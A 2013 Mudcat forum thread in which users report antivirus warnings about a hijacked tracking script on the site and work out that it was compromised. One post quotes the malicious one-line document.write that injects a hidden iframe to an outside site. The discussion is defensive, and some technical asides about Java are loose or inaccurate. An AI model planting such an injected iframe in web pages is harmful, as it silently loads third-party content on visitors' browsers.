Subject: Tech: Mudcat Trojan warnings From: treewind Date: 10 Jul 13 - 03:27 AM Anyone else seeing this? Starting this morning, Kaspersky Internet Security is warning me, on every Mudcat page I open, about something called ga_social_tracking.js which allegedly contains some malware called Trojan-Clicker.JS.Iframe.gb It seems to have something to do with Google analytics, so unless something's gone very wrong at Google this may be a false alarm, but... does anyone know? I tell KIS to block the script every time, and the page then loads normally. I guess the only difference is that my link-following preferences aren't being logged and analysed. I suppose the Google analytics feed is needed for the advertisers... [sigh] |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Peter Date: 10 Jul 13 - 04:19 AM Seeing that too. The script is on Mudcat's server not google's so its not a legit google script. Looks like the Cat has been hacked to me. |
Subject: RE: Tech: Mudcat Trojan warnings From: doc.tom Date: 10 Jul 13 - 04:35 AM I'm getting it too. Bloody Google spying on me - 'harmless' or not, I do not appreciate it. Tom |
Subject: RE: Tech: Mudcat Trojan warnings From: Joe Offer Date: 10 Jul 13 - 04:48 AM If you Google ga_social_tracking.js, you'll find it described as "A simple script to automatically track Facebook and Twitter buttons using Google Analytics social tracking feature." Everything I've looked at, makes it appear to be a harmless utility. Notice has been sent to Max, so I'm sure he'll check it out. But I don't see any need for concern. Here's more information: http://www.lunametrics.com/blog/2012/03/29/tracking-social-google-analytics/ -Joe- |
Subject: RE: Tech: Mudcat Trojan warnings From: Jack Campin Date: 10 Jul 13 - 06:06 AM This kind of clutter is never harmless. The more of it we get, the harder it becomes to spot anything really malicious in the welter of cookies, super-cookies, widgets, trackers, adverts and redirects that make using the web into a rodeo-roping contest with herds of space aliens. Mudcat is completely unusable without having a lot of this stuff blocked, and we get no help in deciding which of these gizmos has to go. |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST Date: 10 Jul 13 - 06:17 AM I haven't seen it. |
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 10 Jul 13 - 06:23 AM The script is on Mudcat, but that doesn't necessarily mean it's been hacked. Google asks you to install analytics scripts on your own web site if you advertise on Google ("sponsored" search results) so you get feedback about who's responded to your adverts, and evidently (as in Mudcat's case) also if you display adverts, to feed back info to the advertisers. But as Kaspersky's flagging it, I thought I'd better ask before assuming it's a false positive and blindly accepting it. I appreciate that Max has to meet his expenses somehow, but if there was a sensibly priced tracking-free/ad-free option for Mudcat, I think I'd subscribe to keep all that cutter out. |
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 10 Jul 13 - 06:24 AM ...or even "keep that clutter out" |
Subject: RE: Tech: Mudcat Trojan warnings From: gnu Date: 10 Jul 13 - 07:11 AM One Mudcat has told me they are gone from Mudcat. Every time I load ANYTHING on Mudcat, my AV displays a big red warning box and blocks it... every single time I click. I can't handle that shit. Oh... *I'll* check back BUT, if I get a big red box, I won't stay. Track my ass. |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Peter Date: 10 Jul 13 - 08:54 AM Just because the name is that of a legit script doesn't mean the script hasn't been infected. On the other hand it could be a false positive from Kaspersky. I am an Adsense publisher too and have never been prompted to install this script. |
Subject: RE: Tech: Mudcat Trojan warnings From: Jeri Date: 10 Jul 13 - 09:26 AM It might be that one particular anti-virus/malware program has very lately changed so it notices this thing, which I believe has been on Mudcat for quite a while, as in years. Does anyone who has a program other than Kaspersky get the alert? --"It" likely being the thing that tracks your clicking of various "share" buttons. Possibly automatically sharing posts/threads on other sites. I know Facebook and Twitter post whenever a music thread is added to. |
Subject: RE: Tech: Mudcat Trojan warnings From: BanjoRay Date: 10 Jul 13 - 09:44 AM I've just logged in on a friend's computer, and haven't seen a sign of it. |
Subject: RE: Tech: Mudcat Trojan warnings From: leeneia Date: 10 Jul 13 - 09:50 AM I've never seen it. Don't use Kaspersky. Don't use twitter or facebook. |
Subject: RE: Tech: Mudcat Trojan warnings From: JHW Date: 10 Jul 13 - 10:26 AM Me neither. (Never done Twitter and gave up Facebook) Have Avira on this computer and AVG on the other. Google Analytics gives a staggering amount of STATISTICAL info on the users of my website though I don't buy any ads (and now like everywhere else they've 'improved' Analytics so the info is now incomprehensible) |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 10 Jul 13 - 11:02 AM The file "ga_social_tracking.js" that I get is not what it claims to be, but consists of a single line document.write("<iframe width='0' height='0' src='http://www.2345.com/?ktjwh202'></iframe>");Now my JavaScript is a bit rusty (haha), but obviously this script is called to insert the line mentioned in the 2345 thread into the HTML of each thread display. This fact alone now seems to prove that Mudcat has been hacked, hardly as a harmless prank. Immediate action is required. I for one disable JavaScript completely. |
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 10 Jul 13 - 02:12 PM Grishka: agreed. That doesn't look so good. Actually the whole 2345 Chinese site thing doesn't look good either. I can't think of any excuse for that to be there. (in which cased Kaspersky is right to flag it. Don't shoot the messenger!) |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 10 Jul 13 - 02:33 PM Once again, hopefully for everybody to understand:
|
Subject: RE: Tech: Mudcat Trojan warnings From: Stanron Date: 10 Jul 13 - 02:36 PM I've posted about this before and no one seemed interested but I'll try again here. I found a very simple, and I suspect old, browser called OffByOne. It is a free download. It's very small. There are no pop ups, no adverts, no hidden scripts, it's just a simple HTML browser. It's perfect for text based forum stuff like Muscat. It wont run videos and it wont run animated ads. It's very fast. Try it. |
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 10 Jul 13 - 02:42 PM Another simple remedy for lots of internet junk can be found by searching for "MVPS hosts file", downloading a copy and copying to the right place in your system. I have a copy of this, and have just added the lines
to it. No more 2345.com for me! |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 10 Jul 13 - 02:46 PM While I typed, Max has reinstalled the old "ga_social_tracking.js", of 4622 bytes (whereas the hijacked one had 93 bytes). I hope he has eradicated the source (Trojan) as well. Best let us clear our browser caches and hope the attack is over, without real damage. |
Subject: RE: Tech: Mudcat Trojan warnings From: Greg F. Date: 10 Jul 13 - 03:00 PM No prob - stay off Shitter and FarceBook. Problem solved. |
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 10 Jul 13 - 03:45 PM "stay off Shitter and FarceBook. Problem solved." Certainly good advice, but if won't fix everything! |
Subject: RE: Tech: Mudcat Trojan warnings From: bobad Date: 10 Jul 13 - 03:56 PM Unplug your computer, lock your windows and doors and don't go out of your house - danger is everywhere. |
Subject: RE: Tech: Mudcat Trojan warnings From: Jack Campin Date: 10 Jul 13 - 04:16 PM Another simple remedy for lots of internet junk can be found by searching for "MVPS hosts file", downloading a copy and copying to the right place in your system. That used to work really well on MacOS 9. On OS X there doesn't seem to be any "right place". |
Subject: RE: Tech: Mudcat Trojan warnings From: gnu Date: 10 Jul 13 - 05:54 PM Well, call me paranoid iffin ya want but I pay Kaspersky $30 a year and they do a hellofalotta good work for me. I mean, imagine what I would caught for cruisin porn sites day and night! >;-) No red warning box now and Mr. Kaspersky is happy... me too. I didn't really wanna leave. |
Subject: RE: Tech: Mudcat Trojan warnings From: Q (Frank Staplin) Date: 10 Jul 13 - 06:08 PM Haven't seen any warning. My cable provider does a good job of providing security. |
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 11 Jul 13 - 04:54 AM On OS X there doesn't seem to be any "right place". http://osxdaily.com/2012/08/07/edit-hosts-file-mac-os-x/ I'd have guessed /etc/hosts - though it seems from the above that this may be a link to /private/etc/hosts. Anyway, seemingly either will work. Despite the Microsoft association with MVPS, the "hosts" file works on all systems - mine is on Linux boxes at home and at work. Oh yes, Kaspersky has stopped complaining here too. |
Subject: RE: Tech: Mudcat Trojan warnings From: Greg F. Date: 11 Jul 13 - 08:52 AM Unplug your computer, lock your windows ... So, Bo- taking reasonable precautions, in your world, makes one a paranoid Luddite. Fascinating. |
Subject: RE: Tech: Mudcat Trojan warnings From: maeve Date: 11 Jul 13 - 10:45 PM It's back. I'm gone until it is. |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST Date: 11 Jul 13 - 10:59 PM Have you seen "Poltergeist"? |
Subject: RE: Tech: Mudcat Trojan warnings From: kendall Date: 12 Jul 13 - 05:45 AM It just popped up. Kasperski blocked it. |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 12 Jul 13 - 07:25 AM Indeed, it's back, the hijacked version of the file "ga_social_tracking.js" of just 93 bytes. Max had reinstalled the intended one on the server, but the Trojan is still active on his own computer. He should make more of an effort to eradicate it. I disable all scripting in my browser. |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST Date: 12 Jul 13 - 01:43 PM "I disable all scripting in my browser." What is scripting, Grishka? (Computer dodo, that's me.) |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 12 Jul 13 - 02:51 PM Dodo, scripting is the execution of script programmes such as "ga_social_tracking.js" by the browser. The most popular scripting language is JavaScript or JScript. In your browser options, you can disable the execution for particular sites. See Wikipedia and your browser help for more details. To be honest, I am not an expert at all, but I can google and read Wikis. |
Subject: RE: Tech: Mudcat Trojan warnings From: Jeri Date: 12 Jul 13 - 02:54 PM Definition of "Script" from http://www.techterms.com/definition/script |
Subject: RE: Tech: Mudcat Trojan warnings From: gnu Date: 12 Jul 13 - 05:18 PM Didn't read any of the the above. Took me two red bixes and two event sounds to get this far. There will be another when I hit submit. I just can't be arsed to be annoyed. See ya on Facecbook. OH, yeah, as far as anyone asking, "Ya don't think they track ya on Facebook?" DUH! At least on FB, I don't have ta put up with the red boxes and the dramatic event warning music. |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,.gargoyle Date: 13 Jul 13 - 07:20 AM Turn off java and turn off flash before entering mudcat. I do ........ and do the same for UK sites such as The Financial Times of London. It makes things easier and faster....I don't need no animated fish jumping from a blue frying pan. Sincerely, Gargoyle two quick clicks and the bartender will return your stuff. Why let the nitnoids bother you and why scatter a continuous trail of flash zombie cookies? .. |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST Date: 13 Jul 13 - 07:37 AM Thank you, Grishka. |
Subject: RE: Tech: Mudcat Trojan warnings From: JohnInKansas Date: 13 Jul 13 - 10:56 AM Java is a "language" developed by Sun Microsystems to be "universal" in all operating systems and on all computers, with an appropriate simple "interpreter." Structurally, it may be thought of as "like html" although as a programming language it is much more powerful and can do about anything to anybody when used by someone malicious. Microsoft had an "agreement" with Sun (according to Microsoft) that allowed them to include Java as a "free option" in Windows. Sun disagreed about the option, so there were continual exchanges of "Did too" - "Did not" - "Yes ya did" - "No we didn't" for a few decades, but nothing very serious ever came of it. Java has always been considered too powerful to be really safe. When Sun decided to "restructure" they sold Java to Oracle. Oracle immediately demanded "per copy royalties" from Microsoft, so it ceased being a free option in Windows. Oracle failed to provide useful support, so Java almost immediately displaced Flash (the previous leader) as "the source of all malware attacks." Some credible estimates are that in 2012 more than 50% of all successful malware exploits used Java.. A recent estimate was that it would take Oracle, if they worked hard on it, at least two years to patch known vulnerabilities - if no new ones were found. New ones have been found. There is a growing concensus that "home users" almost NEVER NEED JAVA AT ALL. I've seen only ONE program identified that might be fairly widely used "by the public" that requires JAVA. It's a particular one for Some businesses may have programs that require it, but they should know, or have advisors to tell you, if you must have it and when you need to turn it on. Otherwise, many advisors recommend that you just get rid of it. JScript is not the same thing as Java. It's just an "interpreter" that can read a number of different kinds of "scripts" in much the same way that your browser "interprets" html. JSript originated as "LiveScript," produced by a company whose name nobody remembers; but another company argued about the naming so both companies changed their name to spite each other and both disappeared soon after. Since the interpreter was left in limbo, it was tacked onto Java (as an app) and renamed JScript. Downloading Java has been an easy way to get JScript, and the JScript has been about the only part of Java most people ever used, but there are other "script readers" that apparently are able to handle JScripts in web pages quite adequately. Information on which one does it in which case is vague, and there are multiple suspects. When one of the declarations of disaster appeared several months ago, I made sure that I removed all prior Java installations and got and installed - from the source - the latest and best of the whole thing. Installation was verified. When I recently tried to check what versions I have, I found the answer to be - - - - NONE. ALL JAVA APPLICATIONS AND APPLETS HAVE DISAPPEARED FROM MY COMPUTER - and I didn't even notice that they were gone. I don't know whether Windows Malware Remover zapped them, whether Norton 360 removed them as "malware," or whether a Windows or IE update just took them away. JScripts still do what they say they do, and everything else still works as well as before. (If they'd do the same to Flash I'd have another celebratory brew.) [For info: I'm running Windows 7 Home Premium and Norton 360, with "AutoUpdates - install automatically" for both.] John |
Subject: RE: Tech: Mudcat Trojan warnings From: Bill D Date: 13 Jul 13 - 11:12 AM I had several nice little programs that were JAVA based, but they were not necessary or any better than others that did almost the same thing. I too am getting along fine without JAVA. |
Subject: RE: Tech: Mudcat Trojan warnings From: JohnInKansas Date: 13 Jul 13 - 11:13 AM An "explosion of red boxes" as mentioned by gnu quite probably comes from the Windows Security Setup. There have been several recent Java/JScript updates offered, but many of them have been "uncertificated." In some cases it may depend on which server delivered an update. When Windows tries to open any program it checks to see whether the program is "signed" so that the source is known, and usually runs a "checksum" verification that the code file is unchanged. If either of these fails, you get a "Are you sure you want to ..." that you can "click to allow." The problem is with the program that's trying to open to process an object like a script, and has NOTHING TO DO WITH whether the object is infected. Even if the user who's logged on has Administrator rights, all programs that don't require Admin authority will run at a lower level, but "Administrator Permission" will be asked before anything that violates the rules can open. It has (almost) nothing to do with infections or malware. John |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Jon Date: 13 Jul 13 - 11:33 AM Lot's I could disagree with above but I won't. I'll just comment that programs written in using the Java programming language are widely used by the general public. Most Android apps are written using it. See Davilik |
Subject: RE: Tech: Mudcat Trojan warnings From: Stilly River Sage Date: 13 Jul 13 - 12:52 PM This seems to be a tempest in a teapot. Did it start with a new installation or the update of an antivirus program? Those programs every so often get a false positive on code or other programs. And when browsers change their coding with updates the antivirus sometimes sees something it can't parse and reports an error. I use a lot of browsers with different settings and applications to watch for problems. I use Win7 Ultimate. And haven't seen any of these glitches that are being reported at Mudcat. SRS |
Subject: RE: Tech: Mudcat Trojan warnings From: Jack Campin Date: 13 Jul 13 - 01:57 PM The iframe is not a virus, from the Mudcat user's viewpoint. What it does is entirely normal web coding - it just has no conceivable innocent purpose. There's no reason for any anti-virus program to flag it. If you aren't seeing it there's something wrong with your browser, since it should be loading iframes when it sees them. But it seems likely it was some sort of virus or trojan that put it there. Only someone with access to Max's hardware can figure out what happened and fix it. |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 13 Jul 13 - 02:19 PM The problem is real and remains as long as the file "http://www.mudcat.org/ga_social_tracking.js" has a length of just 93 bytes. You can use a download manager to test that. For those of us who do not block its execution, the damage is (at least) a dramatic increase in download traffic, everytime we open a thread. The damage for Max, apart from his presumably infested computer and loss of reputation, is that his "social tracking" no longer works. If we all block JavaScript, Mudcat will lose much of its ad revenue to boot. Max had best fix the problem quickly. Has he been informed that his first attempt was not permanently successful, since the Trojan or cracked password is still in force? |
Subject: RE: Tech: Mudcat Trojan warnings From: gnu Date: 13 Jul 13 - 02:52 PM SRS.... "This seems to be a tempest in a teapot." It sure is! But... my tea is spoiled and I expect it to be fixed by Mudcat and NOT by every Mudcatter. Is that too much to ask or am I just still technologically declined? In any case, I had three red boxes and warning tones before I could get to post this and I will only have tp put up with that shit one more time today... at my next click... submit. gnightgnu |
Subject: RE: Tech: Mudcat Trojan warnings From: Don Firth Date: 13 Jul 13 - 03:18 PM For several days running, every time I accessed Mudcat, or tried to change from one thread to another, I'd get a message across the bottom of my screen telling me that Mudcat was not responding because it was running a long-running script, and gave me a box to click that said "Stop script." Every time I come on or tried to change from one thread to another. I even started a thread about it. Then, suddenly, I'm getting pop-up ads 'til hell won't have it. Then I get pop-up ads for stuff like "PC-Cleaner" and "Registry Fix" and warnings that my computer is running slow and I should buy their gizmo program that would fix it. Suspicious, I "X-ed" them off. Some of them wouldn't go away, and I had to do a computer restart. Some of which didn't ask me, they just started to download the bloody program! My web browser is Earthlink and I like to use Google for searches. When these unasked-for downloads got finished screwing up my computer, now, when I click the "Earthlink" icon, I get Bing, along with a pop-up ad for yet another "Registry Cleaner." I have to key in "Earthlink" to reach my web browser. NONE of this I wanted to download! Yet, there it is. Oh, yes! I have two e-mail boxes. One is Earthlink, and that one works. The other is Comcast, which I can still access, but now it won't let me open my e-mail. There is a very good service here in Seattle called "GeekServ," and they send a guy out to the house to exorcise demons like this from one's computer. Come Monday, I'm going to call them. Which, of course, is going to cost me. I don't know if this has anything to do with Mudcat, but it all started when I was on the 'cat. Don Firth P. S. By the way, I use neither Twitter nor Facebook. |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,kendall Date: 13 Jul 13 - 03:27 PM Kasperski warns me of this trojan every time I come on line. It also says it has been blocked. |
Subject: RE: Tech: Mudcat Trojan warnings From: Bill D Date: 13 Jul 13 - 03:33 PM "My web browser is Earthlink " Not really, Don.. Earthlink is a internet service provider...an ISP. Browsers are Internet Explorer, Firefox, Opera...and a dozen more. (Just a technical point....) |
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 13 Jul 13 - 04:04 PM A minute of googling shows that Earthlink do have a browser software of their own, presumably based on one of the popular browser engines. Don, check all "Settings", "Options", "Properties" etc. in your browser, and disable them experimentally. Use some anti-virus software. If you want advice, you need not threaten to shoot yourself; a "please" suffices. Mudcat cannot be blamed for everything; Max does not owe us a perfect world. |
Share Thread: |
Subject: | Help |
From: | |
Preview Automatic Linebreaks Make a link ("blue clicky") |